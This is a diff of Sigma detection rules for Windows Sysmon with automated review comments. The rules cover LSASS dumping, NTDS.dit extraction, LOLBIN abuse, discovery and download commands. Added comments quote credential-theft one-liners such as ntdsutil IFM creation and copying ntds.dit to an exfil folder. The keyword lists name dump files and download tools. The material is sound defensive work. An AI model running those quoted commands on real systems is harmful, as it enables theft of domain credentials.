1 of filter_optional_*) falsepositives: - Unknown 
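Review bot: The two added entries `# - 'msvcrt'` and `# - 'user32'` are commented out with no reason given, so a future maintainer cannot tell whether they were withdrawn for false positives or are pending additions. A short rationale on each line, e.g. `# - 'user32' # not enabled: too common in benign command lines` if that is the cause, would settle it; if they are just candidates, a single `# candidates, not yet validated:` line above them is enough. The remainder of the `selection` list and the `filter_optional_mpcmdrun` filter change only in whitespace.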
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml
index 7dc825537..4a17f5874 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml
@@ -26,38 +26,37 @@ detection: - \qwinsta.exe selection_other_wmi: Image|endswith: \wmic.exe - CommandLine|contains|all: + CommandLine|contains|all: - useraccount - get selection_other_cmdkey: Image|endswith: \cmdkey.exe - CommandLine|contains: ' /l' + CommandLine|contains: ' /l' selection_cmd: Image|endswith: \cmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - ' /c' - 'dir ' - \Users\ filter_cmd: - CommandLine|contains: ' rmdir ' + CommandLine|contains: ' rmdir ' # don't match on 'dir' "C:\Windows\System32\cmd.exe" /q /c rmdir /s /q "C:\Users\XX\AppData\Local\Microsoft\OneDrive\19.232.1124.0005" selection_net: Image|endswith: - \net.exe - \net1.exe - CommandLine|contains: user + CommandLine|contains: user filter_net: - CommandLine|contains: - - /domain - - /add - - /delete - - /active - - /expires - - /passwordreq - - /scriptpath - - /times - - /workstations - condition: process_creation and ((selection_cmd and not filter_cmd) or (selection_net - and not filter_net) or 1 of selection_other_*) + CommandLine|contains: + - /domain # local account discovery only + - /add # discovery only + - /delete # discovery only + - /active # discovery only + - /expires # discovery only + - /passwordreq # discovery only + - /scriptpath # discovery only + - /times # discovery only + - /workstations # discovery only + condition: process_creation and ((selection_cmd and not filter_cmd) or (selection_net and not filter_net) or 1 of selection_other_*) falsepositives: - Legitimate administrator or user enumerates local users for legitimate reason level: low diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml index e01e2421b..7aaa5c2d0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml 
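Review bot: The new comment on `filter_cmd` documents a single OneDrive example, but the filter value `' rmdir '` drops every command line containing that token, which is broader than the example suggests. If the purpose is only to stop `dir` from matching inside `rmdir`, the comment should say that directly, e.g. `# 'rmdir' contains 'dir'; exclude it so plain directory removals do not trigger selection_cmd (example: OneDrive updater)`, so a reader does not assume the filter is scoped to OneDrive. The `filter_net` annotations read consistently, though `/domain # local account discovery only` would be clearer as `# exclude domain queries; rule is scoped to local accounts`.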
@@ -1,17 +1,15 @@ title: LOLBIN Execution From Abnormal Drive id: d4ca7c59-e9e4-42d8-bf57-91a776efcb87 related: - - id: 5b80cf53-3a46-4adc-960b-05ec19348d74 - type: similar + - id: 5b80cf53-3a46-4adc-960b-05ec19348d74 + type: similar status: test -description: Detects LOLBINs executing from an abnormal or uncommon drive such as - a mounted ISO. +description: Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO. references: - https://thedfirreport.com/2021/12/13/diavol-ransomware/ - https://www.scythe.io/library/threat-emulation-qakbot - https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/ -author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - - SEC Consult '@angelo_violetti', Aaron Herman +author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti', Aaron Herman date: 2022/01/25 modified: 2023/08/29 tags: 
@@ -25,32 +23,33 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: - - \calc.exe - - \certutil.exe - - \cmstp.exe - - \cscript.exe - - \installutil.exe - - \mshta.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - OriginalFileName: - - CALC.EXE - - CertUtil.exe - - CMSTP.EXE - - cscript.exe - - installutil.exe - - MSHTA.EXE - - REGSVR32.EXE - - RUNDLL32.EXE - - wscript.exe + # Note: add more lolbins for additional coverage + - Image|endswith: + - \calc.exe + - \certutil.exe + - \cmstp.exe + - \cscript.exe + - \installutil.exe + - \mshta.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - OriginalFileName: + - CALC.EXE + - CertUtil.exe + - CMSTP.EXE + - cscript.exe + - installutil.exe + - MSHTA.EXE + - REGSVR32.EXE + - RUNDLL32.EXE + - wscript.exe filter_main_currentdirectory: CurrentDirectory|contains: C:\ filter_main_empty: CurrentDirectory: '' filter_main_null: - CurrentDirectory: null + CurrentDirectory: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Rare false positives could occur on servers with multiple drives. diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml index 49965adb9..7bad3f13a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml 
@@ -1,14 +1,11 @@ title: LSASS Dump Keyword In CommandLine id: ffa6861c-4461-4f59-8a41-578c39f3f23e related: - - id: a5a2d357-1ab8-4675-a967-ef9990a59391 - type: derived + - id: a5a2d357-1ab8-4675-a967-ef9990a59391 + type: derived status: test -description: 'Detects the presence of the keywords "lsass" and ".dmp" in the commandline, - which could indicate a potential attempt to dump or create a dump of the lsass - process. - - ' +description: | + Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process. references: - https://github.com/Hackndo/lsassy - https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf @@ -16,8 +13,7 @@ references: - https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/ - https://github.com/helpsystems/nanodump - https://github.com/CCob/MirrorDump -author: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron - Systems) +author: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/10/24 modified: 2023/08/29 tags: 
@@ -32,25 +28,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|contains: - - lsass.dmp - - lsass.zip - - lsass.rar - - Andrew.dmp - - Coredump.dmp - - NotLSASS.zip - - lsass_2 - - lsassdump - - lsassdmp - - CommandLine|contains|all: - - lsass - - .dmp - - CommandLine|contains|all: - - SQLDmpr - - .mdmp - - CommandLine|contains|all: - - nanodump - - .dmp + - CommandLine|contains: + - lsass.dmp + - lsass.zip + - lsass.rar + - Andrew.dmp + - Coredump.dmp + - NotLSASS.zip # https://github.com/CCob/MirrorDump + - lsass_2 # default format of procdump v9.0 is lsass_YYMMDD_HHmmss.dmp + - lsassdump + - lsassdmp + - CommandLine|contains|all: + - lsass + - .dmp + - CommandLine|contains|all: + - SQLDmpr + - .mdmp + - CommandLine|contains|all: + - nanodump + - .dmp condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml index a216401c8..135c0e12c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml 
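Review bot: The comment `lsass_2 # default format of procdump v9.0 is lsass_YYMMDD_HHmmss.dmp` explains the keyword but not its limit: with a two-digit year, `lsass_2` only covers file names generated in 2020–2029, so the entry will stop matching the described default name from 2030 onward. Stating that in the comment, e.g. `# procdump v9 default name lsass_YYMMDD_HHmmss.dmp; 'lsass_2' covers years 20-29 only`, makes the maintenance need visible. The `NotLSASS.zip # https://github.com/CCob/MirrorDump` reference is useful as is.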
@@ -1,15 +1,12 @@ title: Potential File Download Via MS-AppInstaller Protocol Handler id: 180c7c5c-d64b-4a63-86e9-68910451bc8b related: - - id: 7cff77e1-9663-46a3-8260-17f2e1aa9d0a - type: derived + - id: 7cff77e1-9663-46a3-8260-17f2e1aa9d0a + type: derived status: experimental -description: 'Detects usage of the "ms-appinstaller" protocol handler via command - line to potentially download arbitrary files via AppInstaller.EXE - +description: | + Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\" - - ' references: - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/ author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel @@ -27,7 +24,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ms-appinstaller://?source= - http condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_network_command.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_network_command.yml index 9c99ea0a6..27c3fff10 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_network_command.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_network_command.yml 
@@ -1,8 +1,7 @@ title: Suspicious Network Command id: a29c1813-ab1f-4dde-b489-330b952e91ae status: test -description: Adversaries may look for details about the network configuration and - settings of systems they access or through information discovery of remote systems +description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' @@ -20,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - ipconfig /all - netsh interface show interface - arp -a diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_network_scan_loop.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_network_scan_loop.yml index c629fe3f1..0b89d8eb2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_network_scan_loop.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_network_scan_loop.yml @@ -1,9 +1,7 @@ title: Suspicious Scan Loop Network id: f8ad2e2c-40b6-4117-84d7-20b89896ab23 status: test -description: Adversaries may attempt to get a listing of other systems by IP address, - hostname, or other logical identifier on a network that may be used for Lateral - Movement from the current system +description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md - https://ss64.com/nt/for.html 
@@ -24,11 +22,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_loop: - CommandLine|contains: + CommandLine|contains: - 'for ' - 'foreach ' selection_tools: - CommandLine|contains: + CommandLine|contains: - nslookup - ping condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_network_sniffing.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_network_sniffing.yml index 8b8f690bf..576b8792c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_network_sniffing.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_network_sniffing.yml @@ -1,17 +1,10 @@ title: Potential Network Sniffing Activity Using Network Tools id: ba1f7802-adc7-48b4-9ecb-81e227fddfd5 status: test -description: 'Detects potential network sniffing via use of network tools such as - "tshark", "windump". - - Network sniffing refers to using the network interface on a system to monitor - or capture information sent over a wired or wireless connection. - - An adversary may place a network interface into promiscuous mode to passively - access data in transit over the network, or use span ports to capture a larger - amount of data. - - ' +description: | + Detects potential network sniffing via use of network tools such as "tshark", "windump". + Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. + An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems) 
@@ -31,7 +24,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_tshark: Image|endswith: \tshark.exe - CommandLine|contains: -i + CommandLine|contains: -i selection_windump: Image|endswith: \windump.exe condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_non_exe_image.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_non_exe_image.yml index d3b3dc0e0..11eb71664 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_non_exe_image.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_non_exe_image.yml @@ -1,14 +1,9 @@ title: Execution of Suspicious File Type Extension id: c09dad97-1c78-4f71-b127-7edb2b8e491a status: experimental -description: 'Detects whether the image specified in a process creation event doesn''t - refer to an ".exe" (or other known executable extension) file. This can be caused - by process ghosting or other unorthodox methods to start a process. - - This rule might require some initial baselining to align with some third party - tooling in the user environment. - - ' +description: | + Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. + This rule might require some initial baselining to align with some third party tooling in the user environment. references: - https://pentestlaboratories.com/2021/12/08/process-ghosting/ author: Max Altgelt (Nextron Systems) @@ -31,8 +26,8 @@ detection: - .com - .exe - .scr - - .tmp - filter_main_image: + - .tmp # sadly many installers use this extension + filter_main_image: # Windows utilities without extension Image: - System - Registry 
@@ -48,8 +43,8 @@ detection: - .rbf - .rbs filter_main_windows_temp: - - ParentImage|contains: :\Windows\Temp\ - - Image|contains: :\Windows\Temp\ + - ParentImage|contains: :\Windows\Temp\ + - Image|contains: :\Windows\Temp\ filter_main_deleted: Image|contains: :\$Extend\$Deleted\ filter_main_empty: @@ -57,7 +52,7 @@ detection: - '-' - '' filter_main_null: - Image: null + Image: filter_optional_avira: ParentImage|contains: :\ProgramData\Avira\ filter_optional_nvidia: @@ -83,8 +78,7 @@ detection: filter_optional_docker: ParentImage: C:\Windows\System32\services.exe Image|endswith: com.docker.service - condition: process_creation and (not known_image_extension and not 1 of filter_main_* - and not 1 of filter_optional_*) + condition: process_creation and (not known_image_extension and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml index ec9c64487..21bc021da 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml @@ -1,8 +1,7 @@ title: Non-privileged Usage of Reg or Powershell id: 8f02c935-effe-45b3-8fc9-ef8696a9e41d status: test -description: Search for usage of reg or Powershell by non-privileged users to modify - service configuration in registry +description: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry references: - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community 
@@ -20,21 +19,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational reg: - CommandLine|contains|all: + CommandLine|contains|all: - 'reg ' - add powershell: - CommandLine|contains: + CommandLine|contains: - powershell - set-itemproperty - ' sp ' - new-itemproperty select_data: IntegrityLevel: Medium - CommandLine|contains|all: + CommandLine|contains|all: - ControlSet - Services - CommandLine|contains: + CommandLine|contains: - ImagePath - FailureCommand - ServiceDLL diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_ntds.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_ntds.yml index b3c91e1c9..896d0219a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_ntds.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_ntds.yml 
@@ -25,46 +25,51 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_tool: - - Image|endswith: - - \NTDSDump.exe - - \NTDSDumpEx.exe - - CommandLine|contains|all: - - ntds.dit - - system.hiv - - CommandLine|contains: NTDSgrab.ps1 + # https://github.com/zcgonvh/NTDSDumpEx + - Image|endswith: + - \NTDSDump.exe + - \NTDSDumpEx.exe + - CommandLine|contains|all: + # ntdsdumpex.exe -d ntds.dit -o hash.txt -s system.hiv + - ntds.dit + - system.hiv + - CommandLine|contains: NTDSgrab.ps1 selection_oneliner_1: - CommandLine|contains|all: + # powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q" + CommandLine|contains|all: - ac i ntds - create full selection_onliner_2: - CommandLine|contains|all: + # cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit + CommandLine|contains|all: - '/c copy ' - \windows\ntds\ntds.dit selection_onliner_3: - CommandLine|contains|all: + # ntdsutil "activate instance ntds" "ifm" "create full c:\windows\temp\data\" "quit" "quit" + CommandLine|contains|all: - activate instance ntds - create full selection_powershell: - CommandLine|contains|all: + CommandLine|contains|all: - powershell - ntds.dit set1_selection_ntds_dit: - CommandLine|contains: ntds.dit + CommandLine|contains: ntds.dit set1_selection_image_folder: - - ParentImage|contains: - - \apache - - \tomcat - - \AppData\ - - \Temp\ - - \Public\ - - \PerfLogs\ - - Image|contains: - - \apache - - \tomcat - - \AppData\ - - \Temp\ - - \Public\ - - \PerfLogs\ + - ParentImage|contains: + - \apache + - \tomcat + - \AppData\ + - \Temp\ + - \Public\ + - \PerfLogs\ + - Image|contains: + - \apache + - \tomcat + - \AppData\ + - \Temp\ + - \Public\ + - \PerfLogs\ condition: process_creation and (1 of selection* or all of set1*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml index eadf2bcbb..7028ec530 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml @@ -1,11 +1,10 @@ title: Potentially Suspicious Call To Win32_NTEventlogFile Class id: caf201a9-c2ce-4a26-9c3a-2b9525413711 related: - - id: e2812b49-bae0-4b21-b366-7c142eafcde2 - type: similar + - id: e2812b49-bae0-4b21-b366-7c142eafcde2 + type: similar status: experimental -description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially - suspicious way (delete, backup, change permissions, etc.) from a PowerShell script +description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script references: - https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85) author: Nasreddine Bencherchali (Nextron Systems) @@ -21,9 +20,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_class: - CommandLine|contains: Win32_NTEventlogFile + CommandLine|contains: Win32_NTEventlogFile selection_function: - CommandLine|contains: + CommandLine|contains: - .BackupEventlog( - .ChangeSecurityPermissions( - .ChangeSecurityPermissionsEx( diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml index 64fc59bd3..9d19b7ed4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml 
@@ -1,11 +1,10 @@ title: Use Short Name Path in Command Line id: 349d891d-fef0-4fe4-bc53-eee623a15969 related: - - id: a96970af-f126-420d-90e1-d37bf25e50e1 - type: similar + - id: a96970af-f126-420d-90e1-d37bf25e50e1 + type: similar status: test -description: Detect use of the Windows 8.3 short name. Which could be used as a method - to avoid command-line detection +description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection references: - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN 
@@ -25,28 +24,27 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - ~1\ - ~2\ filter: - - ParentImage: - - C:\Windows\System32\Dism.exe - - C:\Windows\System32\cleanmgr.exe - - C:\Program Files\GPSoftware\Directory Opus\dopus.exe - - ParentImage|endswith: - - \WebEx\WebexHost.exe - - \thor\thor64.exe - - \veam.backup.shell.exe - - \winget.exe - - \Everything\Everything.exe - - ParentImage|contains: \AppData\Local\Temp\WinGet\ - - CommandLine|contains: - - \appdata\local\webex\webex64\meetings\wbxreport.exe - - C:\Program Files\Git\post-install.bat - - C:\Program Files\Git\cmd\scalar.exe + - ParentImage: + - C:\Windows\System32\Dism.exe + - C:\Windows\System32\cleanmgr.exe + - C:\Program Files\GPSoftware\Directory Opus\dopus.exe + - ParentImage|endswith: + - \WebEx\WebexHost.exe + - \thor\thor64.exe + - \veam.backup.shell.exe + - \winget.exe + - \Everything\Everything.exe + - ParentImage|contains: \AppData\Local\Temp\WinGet\ + - CommandLine|contains: + - \appdata\local\webex\webex64\meetings\wbxreport.exe + - C:\Program Files\Git\post-install.bat + - C:\Program Files\Git\cmd\scalar.exe condition: process_creation and (selection and not filter) falsepositives: - - Applications could use this notation occasionally which might generate some - false positives. In that case investigate the parent and child process. + - Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml index 414a39ec2..34c7f9615 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml @@ -1,11 +1,10 @@ title: Use Short Name Path in Image id: a96970af-f126-420d-90e1-d37bf25e50e1 related: - - id: 349d891d-fef0-4fe4-bc53-eee623a15969 - type: similar + - id: 349d891d-fef0-4fe4-bc53-eee623a15969 + type: similar status: experimental -description: Detect use of the Windows 8.3 short name. Which could be used as a method - to avoid Image detection +description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection references: - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN 
@@ -29,25 +28,24 @@ detection: - ~1\ - ~2\ filter1: - - ParentImage: - - C:\Windows\System32\Dism.exe - - C:\Windows\System32\cleanmgr.exe - - ParentImage|endswith: - - \WebEx\WebexHost.exe - - \thor\thor64.exe - - Product: InstallShield (R) - - Description: InstallShield (R) Setup Engine - - Company: InstallShield Software Corporation + - ParentImage: + - C:\Windows\System32\Dism.exe + - C:\Windows\System32\cleanmgr.exe # Spawns DismHost.exe with a shortened username (if too long) + - ParentImage|endswith: + - \WebEx\WebexHost.exe # Spawns a shortened version of the CLI and Image processes + - \thor\thor64.exe + - Product: InstallShield (R) + - Description: InstallShield (R) Setup Engine + - Company: InstallShield Software Corporation filter_installers: - - Image|contains|all: - - \AppData\ - - \Temp\ - - Image|endswith: - - ~1\unzip.exe - - ~1\7zG.exe + - Image|contains|all: + - \AppData\ + - \Temp\ + - Image|endswith: + - ~1\unzip.exe + - ~1\7zG.exe condition: process_creation and (selection and not 1 of filter*) falsepositives: - - Applications could use this notation occasionally which might generate some - false positives. In that case Investigate the parent and child process. + - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml index 6f89e7a17..5274feb87 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml 
@@ -1,11 +1,10 @@ title: Use NTFS Short Name in Command Line id: dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795 related: - - id: 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b - type: similar + - id: 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b + type: similar status: test -description: Detect use of the Windows 8.3 short name. Which could be used as a method - to avoid command-line detection +description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection references: - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN @@ -25,7 +24,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - ~1.exe - ~1.bat - ~1.msi @@ -45,13 +44,12 @@ detection: - ~2.js - ~2.hta filter: - - ParentImage|endswith: - - \WebEx\WebexHost.exe - - \thor\thor64.exe - - CommandLine|contains: C:\xampp\vcredist\VCREDI~1.EXE + - ParentImage|endswith: + - \WebEx\WebexHost.exe + - \thor\thor64.exe + - CommandLine|contains: C:\xampp\vcredist\VCREDI~1.EXE condition: process_creation and (selection and not filter) falsepositives: - - Applications could use this notation occasionally which might generate some - false positives. In that case Investigate the parent and child process. + - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml index 833fb938d..1989811a6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml @@ -1,11 +1,10 @@ title: Use NTFS Short Name in Image id: 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b related: - - id: dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795 - type: similar + - id: dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795 + type: similar status: experimental -description: Detect use of the Windows 8.3 short name. Which could be used as a method - to avoid Image based detection +description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection references: - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN @@ -56,8 +55,7 @@ detection: Image: C:\PROGRA~1\WinZip\WZPREL~1.EXE filter_optional_vcred: Image|endswith: \VCREDI~1.EXE - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Software Installers level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml index cf32ba624..feb916880 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml 
@@ -1,8 +1,7 @@ title: Obfuscated IP Download Activity id: cb5a2333-56cf-4562-8fcb-22ba1bca728d status: test -description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) - in an URL combined with a download command +description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command references: - https://h.43z.one/ipconverter/ - https://twitter.com/Yasser_Elsnbary/status/1553804135354564608 @@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_command: - CommandLine|contains: + CommandLine|contains: - Invoke-WebRequest - 'iwr ' - 'wget ' 
